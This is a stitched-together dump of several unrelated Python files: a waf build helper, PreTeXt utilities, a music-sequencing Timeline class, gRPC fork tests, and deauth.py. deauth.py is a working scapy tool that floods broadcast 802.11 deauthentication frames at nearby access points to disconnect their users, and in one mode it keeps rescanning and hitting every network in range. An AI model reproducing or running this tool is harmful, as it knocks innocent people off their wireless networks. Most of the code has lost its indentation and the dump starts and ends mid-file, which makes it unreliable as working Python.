pass
atexit.register(close_all)
def put_data(conn, data):
cnt = 0
while cnt < len(data):
sent = conn.send(data[cnt:])
if sent == 0:
raise RuntimeError('connection ended')
cnt += sent
def read_data(conn, siz):
cnt = 0
buf = []
while cnt < siz:
data = conn.recv(min(siz - cnt, 1024))
if not data:
raise RuntimeError('connection ended %r %r' % (cnt, siz))
buf.append(data)
cnt += len(data)
if sys.hexversion > 0x3000000:
ret = ''.encode('iso8859-1').join(buf)
else:
ret = ''.join(buf)
return ret
def exec_command(self, cmd, **kw):
if 'stdout' in kw:
if kw['stdout'] not in (None, subprocess.PIPE):
return self.exec_command_old(cmd, **kw)
elif 'stderr' in kw:
if kw['stderr'] not in (None, subprocess.PIPE):
return self.exec_command_old(cmd, **kw)
kw['shell'] = isinstance(cmd, str)
Logs.debug('runner: %r' % cmd)
Logs.debug('runner_env: kw=%s' % kw)
if self.logger:
self.logger.info(cmd)
if 'stdout' not in kw:
kw['stdout'] = subprocess.PIPE
if 'stderr' not in kw:
kw['stderr'] = subprocess.PIPE
if Logs.verbose and not kw['shell'] and not Utils.check_exe(cmd[0]):
raise Errors.WafError("Program %s not found!" % cmd[0])
idx = threading.current_thread().idx
kw['cmd'] = cmd
# serialization..
#print("sub %r %r" % (idx, cmd))
#print("write to %r %r" % (idx, cmd))
data = cPickle.dumps(kw, -1)
params = [REQ, str(len(data))]
header = make_header(params)
conn = CONNS[idx]
put_data(conn, header + data)
#print("running %r %r" % (idx, cmd))
#print("read from %r %r" % (idx, cmd))
data = read_data(conn, HEADER_SIZE)
if sys.hexversion > 0x3000000:
data = data.decode('iso8859-1')
#print("received %r" % data)
lst = data.split(',')
ret = int(lst[1])
dlen = int(lst[2])
out = err = None
if dlen:
data = read_data(conn, dlen)
(out, err, exc) = cPickle.loads(data)
if exc:
raise Errors.WafError('Execution failure: %s' % exc)
if out:
if not isinstance(out, str):
out = out.decode(sys.stdout.encoding or 'iso8859-1')
if self.logger:
self.logger.debug('out: %s' % out)
else:
Logs.info(out, extra={'stream':sys.stdout, 'c1': ''})
if err:
if not isinstance(err, str):
err = err.decode(sys.stdout.encoding or 'iso8859-1')
if self.logger:
self.logger.error('err: %s' % err)
else:
Logs.info(err, extra={'stream':sys.stderr, 'c1': ''})
return ret
def init_smp(self):
if not getattr(Options.options, 'smp', getattr(self, 'smp', None)):
return
		cmd = None
		if Utils.unversioned_sys_platform() in ('freebsd',):
			pid = os.getpid()
			cmd = ['cpuset', '-l', '0', '-p', str(pid)]
		elif Utils.unversioned_sys_platform() in ('linux',):
			pid = os.getpid()
			cmd = ['taskset', '-pc', '0', str(pid)]
if cmd:
self.cmd_and_log(cmd, quiet=0)
def options(opt):
# memory consumption might be at the lowest point while processing options
opt.add_option('--pin-process', action='store_true', dest='smp', default=False)
if Utils.is_win32 or os.sep != '/':
return
while len(CONNS) < 30:
(pid, conn) = make_conn(opt)
SERVERS.append(pid)
CONNS.append(conn)
def build(bld):
if Utils.is_win32 or os.sep != '/':
return
if bld.cmd == 'clean':
return
while len(CONNS) < bld.jobs:
(pid, conn) = make_conn(bld)
SERVERS.append(pid)
CONNS.append(conn)
init_smp(bld)
bld.__class__.exec_command_old = bld.__class__.exec_command
bld.__class__.exec_command = exec_command
|
utils.py
|
import os
import glob
import random
import json
from contextlib import contextmanager
from http.server import SimpleHTTPRequestHandler
import shutil
import pathlib
import socketserver
import socket
import logging
import threading
import watchdog.events, watchdog.observers, time
from lxml import etree as ET
from . import static
# Get access to logger
log = logging.getLogger('ptxlogger')
@contextmanager
def working_directory(path):
"""
Temporarily change the current working directory.
Usage:
with working_directory(path):
do_things() # working in the given path
do_other_things() # back to original path
"""
current_directory=os.getcwd()
os.chdir(path)
log.debug(f"Now working in directory {path}")
try:
yield
finally:
os.chdir(current_directory)
log.debug(f"Successfully changed directory back to {current_directory}")
def linux_path(path):
# hack to make core ptx and xsl:import happy
p = pathlib.Path(path)
return p.as_posix()
def directory_exists(path):
"""
Checks if the directory exists.
"""
return os.path.exists(path)
# Grabs project directory based on presence of `project.ptx`
def project_path(dirpath=os.getcwd()):
if os.path.isfile(os.path.join(dirpath,'project.ptx')):
# we're at the project root
return dirpath
parentpath = os.path.dirname(dirpath)
if parentpath == dirpath:
# cannot ascend higher, no project found
return None
else:
# check parent instead
return project_path(dirpath=parentpath)
def project_xml(dirpath=os.getcwd()):
if project_path(dirpath) is None:
project_manifest = static.path('templates','project.ptx')
else:
project_manifest = os.path.join(project_path(dirpath), 'project.ptx')
return ET.parse(project_manifest)
def project_xml_string(dirpath=os.getcwd()):
return ET.tostring(project_xml(dirpath), encoding='unicode')
def target_xml(alias=None,dirpath=os.getcwd()):
if alias is None:
return project_xml().find("targets/target")
xpath = f'targets/target[@name="{alias}"]'
matches = project_xml().xpath(xpath)
if len(matches) == 0:
log.info(f"No targets with alias {alias} found in project manifest file project.ptx.")
return None
return project_xml().xpath(xpath)[0]
def text_from_project_xml(xpath,default=None):
matches = project_xml().xpath(xpath)
if len(matches) > 0:
return matches[0].text.strip()
else:
return default
#check xml syntax
def xml_syntax_is_valid(xmlfile):
# parse xml
try:
source_xml = ET.parse(xmlfile)
# we need to call xinclude once for each level of nesting (just to check for errors). 25 levels should be more than sufficient
for i in range(25):
source_xml.xinclude()
log.debug('XML syntax appears well formed.')
if (source_xml.getroot().tag != 'pretext'):
log.error(f'The file {xmlfile} does not have "<pretext>" as its root element. Did you use a subfile as your source? Check the project manifest (project.ptx).')
return False
# check for file IO error
except IOError:
log.error(f'The file {xmlfile} does not exist')
return False
# check for XML syntax errors
except ET.XMLSyntaxError as err:
log.error('XML Syntax Error caused build to fail:')
log.error(str(err.error_log))
return False
except ET.XIncludeError as err:
log.error('XInclude Error caused build to fail:')
log.error(str(err.error_log))
return False
return True
def xml_source_validates_against_schema(xmlfile):
#get path to RelaxNG schema file:
schemarngfile = static.path('schema','pretext.rng')
# Open schemafile for validation:
relaxng = ET.RelaxNG(file=schemarngfile)
# Parse xml file:
source_xml = ET.parse(xmlfile)
## just for testing:
# relaxng.validate(source_xml)
# log = relaxng.error_log
# print(log)
# validate against schema
try:
relaxng.assertValid(source_xml)
log.info('PreTeXt source passed schema validation.')
except ET.DocumentInvalid as err:
log.debug('PreTeXt document did not pass schema validation; unexpected output may result. See .error_schema.log for hints. Continuing with build.')
with open('.error_schema.log', 'w') as error_log_file:
error_log_file.write(str(err.error_log))
return False
return True
# watchdog handler for watching changes to source
class HTMLRebuildHandler(watchdog.events.FileSystemEventHandler):
def __init__(self,callback):
self.last_trigger_at = time.time()-5
self.callback = callback
def on_any_event(self,event):
self.last_trigger_at = time.time()
# only run callback once triggers halt for a second
def timeout_callback(handler):
time.sleep(1.5)
if time.time() > handler.last_trigger_at + 1:
handler.last_trigger_at = time.time()
log.info("\nChanges to source detected.\n")
handler.callback()
threading.Thread(target=timeout_callback,args=(self,)).start()
# boilerplate to prevent overzealous caching by preview server, and
# avoid port issues
def binding_for_access(access="private"):
if os.path.isfile("/home/user/.smc/info.json") or access=="public":
return "0.0.0.0"
else:
return "localhost"
def url_for_access(access="private",port=8000):
if os.path.isfile("/home/user/.smc/info.json"):
project_id = json.loads(open('/home/user/.smc/info.json').read())['project_id']
return f"https://cocalc.com/{project_id}/server/{port}/"
elif access=='public':
return f"http://{socket.gethostbyname(socket.gethostname())}:{port}"
else:
return f"http://localhost:{port}"
def serve_forever(directory,access="private",port=8000):
log.info(f"Now starting a server to preview directory `{directory}`.\n")
binding = binding_for_access(access)
    class RequestHandler(SimpleHTTPRequestHandler):
        """HTTP request handler with no caching."""
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory=directory, **kwargs)
def end_headers(self):
self.send_my_headers()
SimpleHTTPRequestHandler.end_headers(self)
def send_my_headers(self):
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
class TCPServer(socketserver.TCPServer):
allow_reuse_address = True
looking_for_port = True
while looking_for_port:
try:
with TCPServer((binding, port), RequestHandler) as httpd:
looking_for_port = False
url = url_for_access(access,port)
log.info(f"Success! Open the below url in a web browser to preview the most recent build of your project.")
log.info(" "+url)
log.info("Use [Ctrl]+[C] to halt the server.\n")
httpd.serve_forever()
except OSError:
log.warning(f"Port {port} could not be used.")
port = random.randint(49152,65535)
log.warning(f"Trying port {port} instead.\n")
def run_server(directory,access,port,watch_directory=None,watch_callback=lambda:None):
binding = binding_for_access(access)
threading.Thread(target=lambda: serve_forever(directory,access,port),daemon=True).start()
if watch_directory is not None:
log.info(f"\nWatching for changes in `{watch_directory}` ...\n")
event_handler = HTMLRebuildHandler(watch_callback)
observer = watchdog.observers.Observer()
observer.schedule(event_handler, watch_directory, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
log.info("\nClosing server...")
if watch_directory is not None: observer.stop()
if watch_directory is not None: observer.join()
# Info on namespaces: http://lxml.de/tutorial.html#namespaces
NSMAP = {
"xi": "http://www.w3.org/2001/XInclude",
"xml": "http://www.w3.org/XML/1998/namespace",
}
def nstag(prefix,suffix):
return "{" + NSMAP[prefix] + "}" + suffix
def expand_pretext_href(lxml_element):
'''
Expands @pretext-href attributes to point to the distributed xsl directory.
'''
for ele in lxml_element.xpath('//*[@pretext-href]'):
ele.set('href',str(linux_path(static.core_xsl(ele.get('pretext-href'),as_path=True))))
def copy_expanded_xsl(xsl_path: str, output_dir: str):
"""
Copy relevant files that share a directory with `xsl_path`
while pre-processing the `.xsl` files.
"""
xsl_dir = os.path.abspath(os.path.dirname(xsl_path))
output_dir = os.path.abspath(output_dir)
log.debug(f"Copying all files in {xsl_dir} to {output_dir}")
shutil.copytree(xsl_dir, output_dir, dirs_exist_ok=True)
# expand each xsl file
with working_directory(output_dir):
for filename in glob.iglob('**',recursive=True):
# glob lists both files and directories, but we only want to copy files.
if os.path.isfile(filename) and filename.endswith('.xsl'):
log.debug(f"Expanding and copying {filename}")
try:
lxml_element = ET.parse(filename)
expand_pretext_href(lxml_element)
lxml_element.write(filename)
# maybe an xsl file is malformed, but let's continue in case it's unused
except Exception as e:
log.warning(f"Hit error `{e}` when expanding {filename}, continuing anyway...")
|
deauth.py
|
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import socket
from subprocess import call
from threading import Thread
from time import sleep
import printings
# local imports
from scan import WifiScan
conf.verb = 0
RED = "\033[1;31m"
GREEN = "\033[1;32m"
YELLOW = "\033[1;93m"
T_YELLOW = "\033[0;93m"
NORMAL = "\033[0;0m"
class Deauth(object):
def __init__(self, APs, interface):
self.APs = APs
self.interface = interface
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.burst = 32
def start_deauth(self):
conf.iface = self.interface
if 3 <= len(self.APs) < 5:
self.burst = 10
if len(self.APs) >= 7:
self.burst = 3
i=0
while i<10:
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
channel = self.APs[bssid]
call("sudo iwconfig {iface} channel {ch}".format(iface=self.interface, ch=channel), shell=True)
try:
send(packet, count=self.burst)
except socket.error:
print("{R}ERROR: Network-Interface is down.{N}".format(R=RED, N=NORMAL))
sys.exit(0)
print("[{G}+{N}] {pkt} frames sent to {Y}{bssid}{N}".format(pkt=self.burst, G=GREEN, N=NORMAL, Y=YELLOW, bssid=bssid.upper()))
sleep(1)
i = i+1
class DeauthAll(object):
def __init__(self, interface):
self.interface = interface
self.burst = 32
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.deauth_active = False
def start_deauth_all(self):
def scan():
call("sudo clear", shell=True)
print("[{Y}*{N}] Scanning for new Access-Points... (8 sec.)".format(Y=YELLOW, N=NORMAL))
self.deauth_active = False
wifiscan.channelhop_active = True
wifiscan.do_scan()
wifiscan.channelhop_active = False
self.APs = wifiscan.get_access_points()
if len(self.APs) < 1:
print("\n{R}No Access-Points found. :({N}\n".format(R=RED, N=NORMAL))
thread.interrupt_main()
printings.deauth_all()
for bssid in self.APs:
print(" {G}->{N} {bssid} | {Y}{essid}{N}".format(G=GREEN, Y=T_YELLOW, N=NORMAL, bssid=bssid, essid=self.APs[bssid]["essid"]))
self.deauth_active = True
sleep(120)
scan()
conf.iface = self.interface
wifiscan = WifiScan(self.interface)
wifiscan.do_output = False
wifiscan.timeout = 8
hopT = Thread(target=wifiscan.channelhop, args=[])
hopT.daemon = True
hopT.start()
scanT = Thread(target=scan, args=[])
scanT.daemon = True
scanT.start()
while True:
if self.deauth_active:
if 1 < len(self.APs) < 5:
self.burst = 10
elif 5 < len(self.APs):
self.burst = 3
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
send(packet, count=self.burst)
sleep(1)
|
timeline.py
|
import math
import copy
import threading
from .track import Track
from .clock import Clock
from .event import EventDefaults
from ..key import Key
from ..io import MidiOutputDevice
from ..constants import DEFAULT_TICKS_PER_BEAT, DEFAULT_TEMPO
from ..constants import EVENT_TIME, EVENT_ACTION, INTERPOLATION_NONE
from ..exceptions import TrackLimitReachedException, TrackNotFoundException
from ..util import make_clock_multiplier
import logging
log = logging.getLogger(__name__)
class Timeline(object):
"""
A Timeline object encapsulates a number of Tracks, each of which
represents a sequence of note or control events.
It has a `clock_source`, which can be a real-time Clock object, or an
external source such as a MIDI clock (via `isobar.io.MidiInputDevice`).
A Timeline typically runs until it is terminated by calling `stop()`.
If you want the Timeline to terminate as soon as no more events are available,
set `stop_when_done = True`.
"""
def __init__(self,
tempo=DEFAULT_TEMPO,
output_device=None,
clock_source=None,
ticks_per_beat=DEFAULT_TICKS_PER_BEAT):
""" Expect to receive one tick per beat, generate events at 120bpm """
self._clock_source = None
if clock_source is None:
clock_source = Clock(self, tempo, ticks_per_beat)
self.set_clock_source(clock_source)
self.output_devices = []
self.clock_multipliers = {}
if output_device:
self.add_output_device(output_device)
self.current_time = 0
self.max_tracks = 0
self.tracks = []
self.thread = None
self.stop_when_done = False
self.events = []
self.running = False
self.ignore_exceptions = False
self.defaults = EventDefaults()
def get_clock_source(self):
return self._clock_source
def set_clock_source(self, clock_source):
clock_source.clock_target = self
self._clock_source = clock_source
clock_source = property(get_clock_source, set_clock_source)
def get_ticks_per_beat(self):
if self.clock_source:
return self.clock_source.ticks_per_beat
else:
return None
def set_ticks_per_beat(self, ticks_per_beat):
self.clock_source.ticks_per_beat = ticks_per_beat
ticks_per_beat = property(get_ticks_per_beat, set_ticks_per_beat)
@property
def tick_duration(self):
"""
Tick duration, in beats.
"""
return 1.0 / self.ticks_per_beat
def get_tempo(self):
""" Returns the tempo of this timeline's clock, or None if an external
clock source is used (in which case the tempo is unknown).
"""
return self.clock_source.tempo
def set_tempo(self, tempo):
"""
Set the tempo of this timeline's clock.
If the timeline uses an external clock, this operation is invalid, and a
RuntimeError is raised.
Args:
tempo (float): Tempo, in bpm
"""
self.clock_source.tempo = tempo
tempo = property(get_tempo, set_tempo)
def seconds_to_beats(self, seconds):
return seconds * self.tempo / 60.0
def beats_to_seconds(self, beats):
return beats * 60.0 / self.tempo
def tick(self):
"""
Called once every tick to trigger new events.
Raises:
StopIteration: If `stop_when_done` is true and no more events are scheduled.
"""
#--------------------------------------------------------------------------------
# Each time we arrive at precisely a new beat, generate a debug msg.
# Round to several decimal places to avoid 7.999999999 syndrome.
# http://docs.python.org/tutorial/floatingpoint.html
#--------------------------------------------------------------------------------
if round(self.current_time, 8) % 1 == 0:
log.debug("--------------------------------------------------------------------------------")
log.debug("Tick (%d active tracks, %d pending events)" % (len(self.tracks), len(self.events)))
#--------------------------------------------------------------------------------
# Copy self.events because removing from it whilst using it = bad idea.
# Perform events before tracks are executed because an event might
# include scheduling a quantized track, which should then be
# immediately evaluated.
#--------------------------------------------------------------------------------
for event in self.events[:]:
#--------------------------------------------------------------------------------
# The only event we currently get in a Timeline are add_track events
# -- which have a function object associated with them.
#
# Round to work around rounding errors.
# http://docs.python.org/tutorial/floatingpoint.html
#--------------------------------------------------------------------------------
if round(event[EVENT_TIME], 8) <= round(self.current_time, 8):
event[EVENT_ACTION]()
self.events.remove(event)
#--------------------------------------------------------------------------------
# Copy self.tracks because removing from it whilst using it = bad idea
#--------------------------------------------------------------------------------
for track in self.tracks[:]:
try:
track.tick()
except Exception as e:
if self.ignore_exceptions:
print("*** Exception in track: %s" % e)
else:
raise
if track.is_finished and track.remove_when_done:
self.tracks.remove(track)
log.info("Timeline: Track finished, removing from scheduler (total tracks: %d)" % len(self.tracks))
#--------------------------------------------------------------------------------
# If we've run out of notes, raise a StopIteration.
#--------------------------------------------------------------------------------
if len(self.tracks) == 0 and len(self.events) == 0 and self.stop_when_done:
# TODO: Don't do this if we've never played any events, e.g.
# right after calling timeline.background(). Should at least
# wait for some events to happen first.
raise StopIteration
#--------------------------------------------------------------------------------
# Tell our output devices to move forward a step.
#--------------------------------------------------------------------------------
for device in self.output_devices:
clock_multiplier = self.clock_multipliers[device]
ticks = next(clock_multiplier)
for tick in range(ticks):
device.tick()
#--------------------------------------------------------------------------------
# Increment beat count according to our current tick_length.
#--------------------------------------------------------------------------------
self.current_time += self.tick_duration
def dump(self):
""" Output a summary of this Timeline object
"""
print("Timeline (clock: %s, tempo %s)" %
(self.clock_source, self.clock_source.tempo if self.clock_source.tempo else "unknown"))
print((" - %d devices" % len(self.output_devices)))
for device in self.output_devices:
print((" - %s" % device))
print((" - %d tracks" % len(self.tracks)))
for tracks in self.tracks:
print((" - %s" % tracks))
def reset_to_beat(self):
""" Reset the timer to the last beat.
Useful when a MIDI Stop/Reset message is received. """
self.current_time = round(self.current_time)
for tracks in self.tracks:
tracks.reset_to_beat()
def reset(self):
""" Reset the timeline to t = 0. """
self.current_time = 0.0
for track in self.tracks:
track.reset()
def background(self):
""" Run this Timeline in a background thread. """
self.thread = threading.Thread(target=self.run)
        self.thread.daemon = True
self.thread.start()
def run(self, stop_when_done=None, background=False):
""" Run this Timeline in the foreground.
If stop_when_done is set, returns when no tracks are currently
scheduled; otherwise, keeps running indefinitely. """
if stop_when_done and background:
raise Exception("Can't select both stop_when_done and background")
self.start()
if stop_when_done is not None:
self.stop_when_done = stop_when_done
try:
#--------------------------------------------------------------------------------
            # Start the clock. This might be internal (eg a Clock object, running on
# an independent thread), or external (eg a MIDI clock).
#--------------------------------------------------------------------------------
for device in self.output_devices:
device.start()
self.running = True
self.clock_source.run()
except StopIteration:
#--------------------------------------------------------------------------------
# This will be hit if every Pattern in a timeline is exhausted.
#--------------------------------------------------------------------------------
log.info("Timeline: Finished")
self.running = False
except Exception as e:
print((" *** Exception in Timeline thread: %s" % e))
if not self.ignore_exceptions:
raise e
def start(self):
log.info("Timeline: Starting")
def stop(self):
log.info("Timeline: Stopping")
for device in self.output_devices:
device.all_notes_off()
device.stop()
self.clock_source.stop()
def warp(self, warper):
""" Apply a PWarp object to warp our clock's timing. """
self.clock_source.warp(warper)
def unwarp(self, warper):
""" Remove a PWarp object from our clock. """
        self.clock_source.unwarp(warper)
def get_output_device(self):
if len(self.output_devices) != 1:
raise Exception("output_device is ambiguous for Timelines with multiple outputs")
return self.output_devices[0]
def set_output_device(self, output_device):
""" Set a new device to send events to, removing any existing outputs. """
self.output_devices = []
self.add_output_device(output_device)
output_device = property(get_output_device, set_output_device)
def add_output_device(self, output_device):
""" Append a new output device to our output list. """
self.output_devices.append(output_device)
self.clock_multipliers[output_device] = make_clock_multiplier(output_device.ticks_per_beat, self.ticks_per_beat)
def schedule(self,
params=None,
quantize=None,
delay=0,
count=None,
interpolate=INTERPOLATION_NONE,
output_device=None,
remove_when_done=True):
"""
Schedule a new track within this Timeline.
Args:
params (dict): Event dictionary. Keys are generally EVENT_* values, defined in constants.py.
If params is None, a new empty Track will be scheduled and returned.
This can be updated with Track.update() to begin generating events.
params can alternatively be a Pattern that generates a dict output.
quantize (float): Quantize level, in beats. For example, 1.0 will begin executing the
events on the next whole beats.
delay (float): Delay time, in beats, before events should be executed.
If `quantize` and `delay` are both specified, quantization is applied,
and the event is scheduled `delay` beats after the quantization time.
count (int): Number of events to process, or unlimited if not specified.
interpolate (int): Interpolation mode for control segments.
output_device: Output device to send events to. Uses the Timeline default if not specified.
remove_when_done (bool): If True, removes the Track from the Timeline when it is finished.
Otherwise, retains the Track, so update() can later be called to schedule
additional events on it.
Returns:
The new `Track` object.
Raises:
TrackLimitReachedException: If `max_tracks` has been reached.
"""
if not output_device:
#--------------------------------------------------------------------------------
# If no output device exists, send to the system default MIDI output.
#--------------------------------------------------------------------------------
if not self.output_devices:
self.add_output_device(MidiOutputDevice())
output_device = self.output_devices[0]
if self.max_tracks and len(self.tracks) >= self.max_tracks:
raise TrackLimitReachedException("Timeline: Refusing to schedule track (hit limit of %d)" % self.max_tracks)
def start_track(track):
#--------------------------------------------------------------------------------
# Add a new track.
#--------------------------------------------------------------------------------
self.tracks.append(track)
log.info("Timeline: Scheduled new track (total tracks: %d)" % len(self.tracks))
if isinstance(params, Track):
track = params
track.reset()
else:
#--------------------------------------------------------------------------------
# Take a copy of params to avoid modifying the original
#--------------------------------------------------------------------------------
track = Track(self, copy.copy(params), max_event_count=count, interpolate=interpolate,
output_device=output_device, remove_when_done=remove_when_done)
if quantize is None:
quantize = self.defaults.quantize
if quantize or delay:
#--------------------------------------------------------------------------------
# We don't want to begin events right away -- either wait till
# the next beat boundary (quantize), or delay a number of beats.
#--------------------------------------------------------------------------------
scheduled_time = self.current_time
if quantize:
scheduled_time = quantize * math.ceil(float(self.current_time) / quantize)
scheduled_time += delay
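                # Worked example (hypothetical numbers): with current_time = 3.2, quantize = 1.0
                # and delay = 0.5, scheduled_time becomes 1.0 * ceil(3.2 / 1.0) + 0.5 = 4.5 beats,
                # i.e. the track starts half a beat after the next whole-beat boundary.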
self.events.append({
EVENT_TIME: scheduled_time,
EVENT_ACTION: lambda: start_track(track)
})
else:
#--------------------------------------------------------------------------------
# Begin events on this track right away.
#--------------------------------------------------------------------------------
start_track(track)
return track
#--------------------------------------------------------------------------------
# Backwards-compatibility
#--------------------------------------------------------------------------------
sched = schedule
def unschedule(self, track):
if track not in self.tracks:
raise TrackNotFoundException("Track is not currently scheduled")
self.tracks.remove(track)
def clear(self):
for track in self.tracks[:]:
self.unschedule(track)
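#--------------------------------------------------------------------------------
# Minimal usage sketch (commented out; assumes the pattern classes and event keys
# of the wider isobar package, e.g. PSequence and the "note" event key, which are
# not defined in this file):
#
#   timeline = Timeline(tempo=120)
#   timeline.schedule({"note": PSequence([60, 64, 67, 72], 1)})
#   timeline.run(stop_when_done=True)
#--------------------------------------------------------------------------------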
|
methods.py
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementations of fork support test methods."""
import enum
import json
import logging
import multiprocessing
import os
import threading
import time
import grpc
from six.moves import queue
from src.proto.grpc.testing import empty_pb2
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import test_pb2_grpc
_LOGGER = logging.getLogger(__name__)
def _channel(args):
target = '{}:{}'.format(args.server_host, args.server_port)
if args.use_tls:
channel_credentials = grpc.ssl_channel_credentials()
channel = grpc.secure_channel(target, channel_credentials)
else:
channel = grpc.insecure_channel(target)
return channel
def _validate_payload_type_and_length(response, expected_type, expected_length):
if response.payload.type is not expected_type:
raise ValueError('expected payload type %s, got %s' %
(expected_type, type(response.payload.type)))
elif len(response.payload.body) != expected_length:
raise ValueError('expected payload body size %d, got %d' %
(expected_length, len(response.payload.body)))
def _async_unary(stub):
size = 314159
request = messages_pb2.SimpleRequest(
response_type=messages_pb2.COMPRESSABLE,
response_size=size,
payload=messages_pb2.Payload(body=b'\x00' * 271828))
response_future = stub.UnaryCall.future(request)
response = response_future.result()
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE, size)
def _blocking_unary(stub):
size = 314159
request = messages_pb2.SimpleRequest(
response_type=messages_pb2.COMPRESSABLE,
response_size=size,
payload=messages_pb2.Payload(body=b'\x00' * 271828))
response = stub.UnaryCall(request)
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE, size)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
with self._condition:
while not self._values and self._open:
self._condition.wait()
if self._values:
return self._values.pop(0)
else:
raise StopIteration()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify()
def close(self):
with self._condition:
self._open = False
self._condition.notify()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
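# Illustrative sketch of how the tests below drive a _Pipe (mirrors
# _ping_pong_with_child_processes_after_first_response; 'stub' and 'request' are assumed
# to already exist):
#
#   pipe = _Pipe()
#   call = stub.FullDuplexCall(pipe)   # gRPC pulls requests from the iterator lazily
#   pipe.add(request)                  # unblocks the next() waiting inside gRPC
#   response = next(call)
#   pipe.close()                       # ends the request stream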
class _ChildProcess(object):
def __init__(self, task, args=None):
if args is None:
args = ()
self._exceptions = multiprocessing.Queue()
def record_exceptions():
try:
task(*args)
except Exception as e: # pylint: disable=broad-except
self._exceptions.put(e)
self._process = multiprocessing.Process(target=record_exceptions)
def start(self):
self._process.start()
def finish(self):
self._process.join()
if self._process.exitcode != 0:
raise ValueError('Child process failed with exitcode %d' %
self._process.exitcode)
try:
exception = self._exceptions.get(block=False)
raise ValueError('Child process failed: %s' % exception)
except queue.Empty:
pass
def _async_unary_same_channel(channel):
def child_target():
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
child_process.finish()
def _async_unary_new_channel(channel, args):
def child_target():
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_async_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
child_process.finish()
def _blocking_unary_same_channel(channel):
def child_target():
try:
_blocking_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
child_process.finish()
def _blocking_unary_new_channel(channel, args):
def child_target():
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_blocking_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_blocking_unary(stub)
child_process.finish()
# Verify that the fork channel registry can handle already closed channels
def _close_channel_before_fork(channel, args):
def child_target():
new_channel.close()
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_blocking_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
channel.close()
new_channel = _channel(args)
new_stub = test_pb2_grpc.TestServiceStub(new_channel)
child_process = _ChildProcess(child_target)
child_process.start()
_blocking_unary(new_stub)
child_process.finish()
def _connectivity_watch(channel, args):
def child_target():
def child_connectivity_callback(state):
child_states.append(state)
child_states = []
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
child_channel.subscribe(child_connectivity_callback)
_async_unary(child_stub)
if len(child_states
) < 2 or child_states[-1] != grpc.ChannelConnectivity.READY:
raise ValueError('Channel did not move to READY')
if len(parent_states) > 1:
raise ValueError('Received connectivity updates on parent callback')
child_channel.unsubscribe(child_connectivity_callback)
child_channel.close()
def parent_connectivity_callback(state):
parent_states.append(state)
parent_states = []
channel.subscribe(parent_connectivity_callback)
stub = test_pb2_grpc.TestServiceStub(channel)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
if len(parent_states
) < 2 or parent_states[-1] != grpc.ChannelConnectivity.READY:
raise ValueError('Channel did not move to READY')
channel.unsubscribe(parent_connectivity_callback)
child_process.finish()
# Need to unsubscribe or _channel.py in _poll_connectivity triggers a
# "Cannot invoke RPC on closed channel!" error.
# TODO(ericgribkoff) Fix issue with channel.close() and connectivity polling
channel.unsubscribe(parent_connectivity_callback)
def _ping_pong_with_child_processes_after_first_response(
channel, args, child_target, run_after_close=True):
request_response_sizes = (
31415,
9,
2653,
58979,
)
request_payload_sizes = (
27182,
8,
1828,
45904,
)
stub = test_pb2_grpc.TestServiceStub(channel)
pipe = _Pipe()
parent_bidi_call = stub.FullDuplexCall(pipe)
child_processes = []
first_message_received = False
for response_size, payload_size in zip(request_response_sizes,
request_payload_sizes):
request = messages_pb2.StreamingOutputCallRequest(
response_type=messages_pb2.COMPRESSABLE,
response_parameters=(
messages_pb2.ResponseParameters(size=response_size),),
payload=messages_pb2.Payload(body=b'\x00' * payload_size))
pipe.add(request)
if first_message_received:
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
response = next(parent_bidi_call)
first_message_received = True
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE,
response_size)
pipe.close()
if run_after_close:
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
for child_process in child_processes:
